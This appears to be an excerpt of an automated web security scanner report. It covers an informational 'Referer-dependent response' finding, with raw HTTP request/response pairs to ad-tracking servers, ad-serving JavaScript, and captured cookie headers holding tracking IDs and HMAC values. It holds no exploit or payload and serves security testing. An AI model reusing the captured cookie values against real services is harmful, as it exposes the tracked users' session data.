<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...
11. Referer-dependent response  previous  next
There are 16 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

11.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-33-35_10260675261305207215; expires=Tue, 10-May-2016 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10260675261305207215; expires=Thu, 12-May-2011 13:48:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttribute('id',this.c3V
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:20 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Content-Type: text/html

11.2. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.yieldmanager.com
Path:   /imp

Request 1

GET /imp?Z=300x250&anmember=541&anprice=300&s=1588565&_salt=2649311919&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#N==#3P+HYn; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0160.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:32:52 GMT
Pragma: no-cache
Content-Length: 938
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://adserving.cpxinteractive.com/iframe3?gk8AAFU9GAAOhIEAAAAAAN17IwAAAAAAAAAAAAIAAAAAABAAAwAFCRQ-JgAAAAAAtMofAAAAAAAuiC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-1w8AAAAAAAIAAwAAAAAAPwrXo3A9.j8Mk6mCUUkDQDQzMzMzMwlA30-Nl24SEEBv27Zt27YJQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQeCJABMYUCtGA.AnqIilFesxMMNUqyexZyB6LAAAAAA==,,http%3A%2F%2Fadserving2.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D300x250%26section%3D1588565,Z%3D300x250%26anmember%3D541%26anprice%3D300%26s%3D1588565%26_salt%3D2649311919%26B%3D10%26r%3D0,55f5fc6c-7c9c-11e0-bac6-3b12a2c9340a\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 8487950;
rm_data.offer_type = 20;
rm_data.entity_id = 312668;
if (window.rm_crex_data) {rm_crex_data.push(8487950);}

Request 2

GET /imp?Z=300x250&anmember=541&anprice=300&s=1588565&_salt=2649311919&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#N==#3P+HYn; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; 